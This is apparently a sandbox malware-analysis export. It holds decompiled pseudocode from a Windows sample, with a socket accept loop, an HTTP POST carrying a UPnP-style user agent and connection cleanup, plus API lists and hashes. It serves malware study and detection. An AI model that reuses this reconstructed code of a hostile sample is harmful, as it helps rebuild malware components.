                                                                                                                                                                                                                                                                                    					if(_t33 != 0x102) {
                                                                                                                                                                                                                                                                                    						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                                                                                                                                                                                                                    						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                                                                                                                                                                                                                    							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                                    							_v100 = 0x10;
                                                                                                                                                                                                                                                                                    							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                                                                                                                                                                                                                    							if(_t49 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								_t77 = E0040DF90(_t56, _t49);
                                                                                                                                                                                                                                                                                    								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    								if(_t77 != 0) {
                                                                                                                                                                                                                                                                                    									_t15 = _t77 + 0x264; // 0x264
                                                                                                                                                                                                                                                                                    									E0040E220(0, _t77, _t56, _t15);
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                                    									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                                                                                                                                                                                                                    										E0040E7D0(_t77);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t34 = GetTickCount();
                                                                                                                                                                                                                                                                                    					_t74 = _v92;
                                                                                                                                                                                                                                                                                    					if(_t34 - _t74 < 0x3e8) {
                                                                                                                                                                                                                                                                                    						if(GetTickCount() - _t74 < 0x2710) {
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						EnterCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                                    						if(_t75 == 0) {
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                                    							_v92 = GetTickCount();
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                                                                                    							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                                                                                                                                                                                                                    							if(E0040BE60() - _t42 >= 0x1e) {
                                                                                                                                                                                                                                                                                    								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                    									E00409600(_t45);
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                                                                                                                                                                                                                    						} while (_t75 != 0);
                                                                                                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t76 = _t56 + 0x20;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t70 == 0) {
                                                                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                                                                                                                                                                                                                    						if(_t70 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040E300(_t56, _t70, _t78);
                                                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                                                                    					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                                    				} while (_t33 != 0);
                                                                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                                                                    			}




























                                                                                                                                                                                                                                                                                    0x0040e406
                                                                                                                                                                                                                                                                                    0x0040e40c
                                                                                                                                                                                                                                                                                    0x0040e412
                                                                                                                                                                                                                                                                                    0x0040e415
                                                                                                                                                                                                                                                                                    0x0040e41f
                                                                                                                                                                                                                                                                                    0x0040e427
                                                                                                                                                                                                                                                                                    0x0040e5a9
                                                                                                                                                                                                                                                                                    0x0040e5af
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e42d
                                                                                                                                                                                                                                                                                    0x0040e42d
                                                                                                                                                                                                                                                                                    0x0040e433
                                                                                                                                                                                                                                                                                    0x0040e439
                                                                                                                                                                                                                                                                                    0x0040e444
                                                                                                                                                                                                                                                                                    0x0040e456
                                                                                                                                                                                                                                                                                    0x0040e461
                                                                                                                                                                                                                                                                                    0x0040e472
                                                                                                                                                                                                                                                                                    0x0040e480
                                                                                                                                                                                                                                                                                    0x0040e488
                                                                                                                                                                                                                                                                                    0x0040e491
                                                                                                                                                                                                                                                                                    0x0040e49b
                                                                                                                                                                                                                                                                                    0x0040e49d
                                                                                                                                                                                                                                                                                    0x0040e4a2
                                                                                                                                                                                                                                                                                    0x0040e4a4
                                                                                                                                                                                                                                                                                    0x0040e4b0
                                                                                                                                                                                                                                                                                    0x0040e4b5
                                                                                                                                                                                                                                                                                    0x0040e4bf
                                                                                                                                                                                                                                                                                    0x0040e4cb
                                                                                                                                                                                                                                                                                    0x0040e4cb
                                                                                                                                                                                                                                                                                    0x0040e4bf
                                                                                                                                                                                                                                                                                    0x0040e4a2
                                                                                                                                                                                                                                                                                    0x0040e491
                                                                                                                                                                                                                                                                                    0x0040e461
                                                                                                                                                                                                                                                                                    0x0040e4d6
                                                                                                                                                                                                                                                                                    0x0040e4d8
                                                                                                                                                                                                                                                                                    0x0040e4e3
                                                                                                                                                                                                                                                                                    0x0040e52c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e532
                                                                                                                                                                                                                                                                                    0x0040e538
                                                                                                                                                                                                                                                                                    0x0040e53d
                                                                                                                                                                                                                                                                                    0x0040e581
                                                                                                                                                                                                                                                                                    0x0040e585
                                                                                                                                                                                                                                                                                    0x0040e591
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e545
                                                                                                                                                                                                                                                                                    0x0040e557
                                                                                                                                                                                                                                                                                    0x0040e559
                                                                                                                                                                                                                                                                                    0x0040e562
                                                                                                                                                                                                                                                                                    0x0040e565
                                                                                                                                                                                                                                                                                    0x0040e56a
                                                                                                                                                                                                                                                                                    0x0040e56d
                                                                                                                                                                                                                                                                                    0x0040e56d
                                                                                                                                                                                                                                                                                    0x0040e562
                                                                                                                                                                                                                                                                                    0x0040e577
                                                                                                                                                                                                                                                                                    0x0040e57d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e53f
                                                                                                                                                                                                                                                                                    0x0040e4e5
                                                                                                                                                                                                                                                                                    0x0040e4e9
                                                                                                                                                                                                                                                                                    0x0040e4ef
                                                                                                                                                                                                                                                                                    0x0040e4f4
                                                                                                                                                                                                                                                                                    0x0040e51a
                                                                                                                                                                                                                                                                                    0x0040e51b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e51b
                                                                                                                                                                                                                                                                                    0x0040e4f6
                                                                                                                                                                                                                                                                                    0x0040e4ff
                                                                                                                                                                                                                                                                                    0x0040e507
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e509
                                                                                                                                                                                                                                                                                    0x0040e50a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e50a
                                                                                                                                                                                                                                                                                    0x0040e507
                                                                                                                                                                                                                                                                                    0x0040e515
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e595
                                                                                                                                                                                                                                                                                    0x0040e59b
                                                                                                                                                                                                                                                                                    0x0040e5a1
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E40C
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E41F
                                                                                                                                                                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0040E439
                                                                                                                                                                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 0040E456
                                                                                                                                                                                                                                                                                    • accept.WS2_32(?,?,?), ref: 0040E488
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E4D6
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040E4E9
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E50A
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E51B
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E523
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040E532
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E545
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040E585
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040E58B
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040E59B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                                                    • Opcode ID: bb4d3cf90a14a1c5926323184073f7f145db719bf38f75a5591e561ad632ef64
                                                                                                                                                                                                                                                                                    • Instruction ID: 917b59bc2a3588b9956fd89eac52db2b1e6dcbcc9db4fe113c03d7dfd46bf168
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb4d3cf90a14a1c5926323184073f7f145db719bf38f75a5591e561ad632ef64
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29413671500200ABCB209F75DC8CB9B77A9AF44714F048E3EF955A72C1EB78E891CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                    			E0040CD60(char* _a4, char* _a8, void* _a12, long* _a16) {
                                                                                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                                                                                    				char _v772;
                                                                                                                                                                                                                                                                                    				char* _v776;
                                                                                                                                                                                                                                                                                    				void* _v780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v792;
                                                                                                                                                                                                                                                                                    				char* _v796;
                                                                                                                                                                                                                                                                                    				signed short _v816;
                                                                                                                                                                                                                                                                                    				intOrPtr _v820;
                                                                                                                                                                                                                                                                                    				char* _v824;
                                                                                                                                                                                                                                                                                    				void _v836;
                                                                                                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                                                                                                    				void* _v844;
                                                                                                                                                                                                                                                                                    				void* _v848;
                                                                                                                                                                                                                                                                                    				char* _v852;
                                                                                                                                                                                                                                                                                    				long _v856;
                                                                                                                                                                                                                                                                                    				void _v1884;
                                                                                                                                                                                                                                                                                    				long _v1888;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v776 = 0;
                                                                                                                                                                                                                                                                                    				_v840 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v836, 0, 0x38);
                                                                                                                                                                                                                                                                                    				_t103 = _t102 + 0xc;
                                                                                                                                                                                                                                                                                    				_v840 = 0x3c;
                                                                                                                                                                                                                                                                                    				_v824 =  &_v260;
                                                                                                                                                                                                                                                                                    				_v820 = 0x100;
                                                                                                                                                                                                                                                                                    				_v796 =  &_v772;
                                                                                                                                                                                                                                                                                    				_v792 = 0x200;
                                                                                                                                                                                                                                                                                    				InternetCrackUrlA(_a4, 0, 0x10000000,  &_v840);
                                                                                                                                                                                                                                                                                    				_v780 = InternetOpenA("Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)", 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v780 != 0) {
                                                                                                                                                                                                                                                                                    					_v844 = InternetConnectA(_v780,  &_v260, _v816 & 0x0000ffff, 0, 0, 3, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v844 != 0) {
                                                                                                                                                                                                                                                                                    						_v848 = HttpOpenRequestA(_v844, "POST",  &_v772, 0, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v848 != 0) {
                                                                                                                                                                                                                                                                                    							HttpAddRequestHeadersA(_v848, _a8, 0xffffffff, 0xa0000000);
                                                                                                                                                                                                                                                                                    							_v852 = "Content-Type: text/xml; charset=\"utf-8\"\r\nConnection: Close\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n";
                                                                                                                                                                                                                                                                                    							if(HttpSendRequestA(_v848, _v852, 0xffffffff, _a12,  *_a16) != 0) {
                                                                                                                                                                                                                                                                                    								_v856 = 0;
                                                                                                                                                                                                                                                                                    								while(1 != 0) {
                                                                                                                                                                                                                                                                                    									_t98 = _v848;
                                                                                                                                                                                                                                                                                    									if(InternetReadFile(_v848,  &_v1884, 0x400,  &_v1888) != 0 && _v1888 != 0) {
                                                                                                                                                                                                                                                                                    										_v776 = E00408B60(_v776, _t98, _v776, _v856 + _v1888);
                                                                                                                                                                                                                                                                                    										memcpy( &(_v776[_v856]),  &_v1884, _v1888);
                                                                                                                                                                                                                                                                                    										_t103 = _t103 + 0x14;
                                                                                                                                                                                                                                                                                    										_v856 = _v856 + _v1888;
                                                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								 *_a16 = _v856;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							InternetCloseHandle(_v848);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						InternetCloseHandle(_v844);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v780);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v776;
                                                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                                                    0x0040cd69
                                                                                                                                                                                                                                                                                    0x0040cd73
                                                                                                                                                                                                                                                                                    0x0040cd88
                                                                                                                                                                                                                                                                                    0x0040cd8d
                                                                                                                                                                                                                                                                                    0x0040cd90
                                                                                                                                                                                                                                                                                    0x0040cda0
                                                                                                                                                                                                                                                                                    0x0040cda6
                                                                                                                                                                                                                                                                                    0x0040cdb6
                                                                                                                                                                                                                                                                                    0x0040cdbc
                                                                                                                                                                                                                                                                                    0x0040cdd8
                                                                                                                                                                                                                                                                                    0x0040cdf1
                                                                                                                                                                                                                                                                                    0x0040cdfe
                                                                                                                                                                                                                                                                                    0x0040ce2a
                                                                                                                                                                                                                                                                                    0x0040ce37
                                                                                                                                                                                                                                                                                    0x0040ce60
                                                                                                                                                                                                                                                                                    0x0040ce6d
                                                                                                                                                                                                                                                                                    0x0040ce85
                                                                                                                                                                                                                                                                                    0x0040ce8b
                                                                                                                                                                                                                                                                                    0x0040ceb7
                                                                                                                                                                                                                                                                                    0x0040cebd
                                                                                                                                                                                                                                                                                    0x0040cec7
                                                                                                                                                                                                                                                                                    0x0040cee7
                                                                                                                                                                                                                                                                                    0x0040cef6
                                                                                                                                                                                                                                                                                    0x0040cf1f
                                                                                                                                                                                                                                                                                    0x0040cf40
                                                                                                                                                                                                                                                                                    0x0040cf45
                                                                                                                                                                                                                                                                                    0x0040cf54
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040cf54
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040cef6
                                                                                                                                                                                                                                                                                    0x0040cf68
                                                                                                                                                                                                                                                                                    0x0040cf68
                                                                                                                                                                                                                                                                                    0x0040cf71
                                                                                                                                                                                                                                                                                    0x0040cf71
                                                                                                                                                                                                                                                                                    0x0040cf7e
                                                                                                                                                                                                                                                                                    0x0040cf7e
                                                                                                                                                                                                                                                                                    0x0040cf8b
                                                                                                                                                                                                                                                                                    0x0040cf8b
                                                                                                                                                                                                                                                                                    0x0040cf9a

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040CD88
                                                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040CDD8
                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040CDEB
                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040CE24
                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CE5A
                                                                                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040CE85
                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,004108D0,000000FF,00009E34), ref: 0040CEAF
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040CEEE
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040CF40
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF71
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF7E
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CF8B
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                                                    • Opcode ID: c6376e83d60c8fd7847bc7aaada5821a3adf07af9ef20e77e1c46dfbd3437302
                                                                                                                                                                                                                                                                                    • Instruction ID: ea500a29b1865390ea74af70c7a13144c6f50436d918f4b951375f33d6e11f24
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6376e83d60c8fd7847bc7aaada5821a3adf07af9ef20e77e1c46dfbd3437302
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A512CB5900228ABDB26DF54CC94BD973BDAB48705F1081E9B60DA62C0C7B86FC4CF54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                    			E0040E0E0(intOrPtr* __edi) {
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                                                                    				long _t40;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				LONG* _t62;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t53 = __edi;
                                                                                                                                                                                                                                                                                    				if(__edi == 0 ||  *__edi != 0x494f4350) {
                                                                                                                                                                                                                                                                                    					return _t25;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t1 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t1);
                                                                                                                                                                                                                                                                                    					_t55 =  *((intOrPtr*)(__edi + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                                                    						_t13 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t13);
                                                                                                                                                                                                                                                                                    						SetEvent( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                                    						_t56 = 0;
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)(_t53 + 4)) <= 0) {
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							E0040BC90( *((intOrPtr*)(_t53 + 0xc)), 0xffffffff);
                                                                                                                                                                                                                                                                                    							E0040BDD0( *((intOrPtr*)(_t53 + 0xc)));
                                                                                                                                                                                                                                                                                    							CloseHandle( *(_t53 + 8));
                                                                                                                                                                                                                                                                                    							CloseHandle( *(_t53 + 0x10));
                                                                                                                                                                                                                                                                                    							__imp__WSACloseEvent( *((intOrPtr*)(_t53 + 0x18)));
                                                                                                                                                                                                                                                                                    							E00409600( *((intOrPtr*)(_t53 + 0x14)));
                                                                                                                                                                                                                                                                                    							_t24 = _t53 + 0x20; // 0x20
                                                                                                                                                                                                                                                                                    							DeleteCriticalSection(_t24);
                                                                                                                                                                                                                                                                                    							return E00408C70(_t53);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                                                                    							PostQueuedCompletionStatus( *(_t53 + 8), 0, 0, 0);
                                                                                                                                                                                                                                                                                    							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                                    						} while (_t56 <  *((intOrPtr*)(_t53 + 4)));
                                                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                                                                    						if( *_t55 == 0x69636c69) {
                                                                                                                                                                                                                                                                                    							if( *((char*)(_t55 + 0x275)) == 0) {
                                                                                                                                                                                                                                                                                    								_t62 = _t55 + 0x21c;
                                                                                                                                                                                                                                                                                    								_t40 = InterlockedExchangeAdd(_t62, 0);
                                                                                                                                                                                                                                                                                    								if(_t40 == 0) {
                                                                                                                                                                                                                                                                                    									 *(_t55 + 0x230) = _t40;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x220)) = 1;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x228)) = _t55 + 8;
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t55 + 0x22c)) = 0x200;
                                                                                                                                                                                                                                                                                    									InterlockedIncrement(_t62);
                                                                                                                                                                                                                                                                                    									if(E0040E730(_t55) == 0) {
                                                                                                                                                                                                                                                                                    										InterlockedDecrement(_t62);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t55 =  *((intOrPtr*)(_t55 + 0x280));
                                                                                                                                                                                                                                                                                    					} while (_t55 != 0);
                                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    0x0040e0e0
                                                                                                                                                                                                                                                                                    0x0040e0e2
                                                                                                                                                                                                                                                                                    0x0040e217
                                                                                                                                                                                                                                                                                    0x0040e0f4
                                                                                                                                                                                                                                                                                    0x0040e0f6
                                                                                                                                                                                                                                                                                    0x0040e0fa
                                                                                                                                                                                                                                                                                    0x0040e100
                                                                                                                                                                                                                                                                                    0x0040e105
                                                                                                                                                                                                                                                                                    0x0040e190
                                                                                                                                                                                                                                                                                    0x0040e190
                                                                                                                                                                                                                                                                                    0x0040e194
                                                                                                                                                                                                                                                                                    0x0040e19e
                                                                                                                                                                                                                                                                                    0x0040e1a4
                                                                                                                                                                                                                                                                                    0x0040e1a9
                                                                                                                                                                                                                                                                                    0x0040e1c3
                                                                                                                                                                                                                                                                                    0x0040e1c9
                                                                                                                                                                                                                                                                                    0x0040e1d2
                                                                                                                                                                                                                                                                                    0x0040e1e4
                                                                                                                                                                                                                                                                                    0x0040e1ea
                                                                                                                                                                                                                                                                                    0x0040e1f0
                                                                                                                                                                                                                                                                                    0x0040e1fa
                                                                                                                                                                                                                                                                                    0x0040e202
                                                                                                                                                                                                                                                                                    0x0040e206
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e216
                                                                                                                                                                                                                                                                                    0x0040e1b1
                                                                                                                                                                                                                                                                                    0x0040e1bb
                                                                                                                                                                                                                                                                                    0x0040e1bd
                                                                                                                                                                                                                                                                                    0x0040e1be
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e10b
                                                                                                                                                                                                                                                                                    0x0040e10b
                                                                                                                                                                                                                                                                                    0x0040e111
                                                                                                                                                                                                                                                                                    0x0040e133
                                                                                                                                                                                                                                                                                    0x0040e137
                                                                                                                                                                                                                                                                                    0x0040e13e
                                                                                                                                                                                                                                                                                    0x0040e146
                                                                                                                                                                                                                                                                                    0x0040e14c
                                                                                                                                                                                                                                                                                    0x0040e152
                                                                                                                                                                                                                                                                                    0x0040e15c
                                                                                                                                                                                                                                                                                    0x0040e162
                                                                                                                                                                                                                                                                                    0x0040e16c
                                                                                                                                                                                                                                                                                    0x0040e179
                                                                                                                                                                                                                                                                                    0x0040e17c
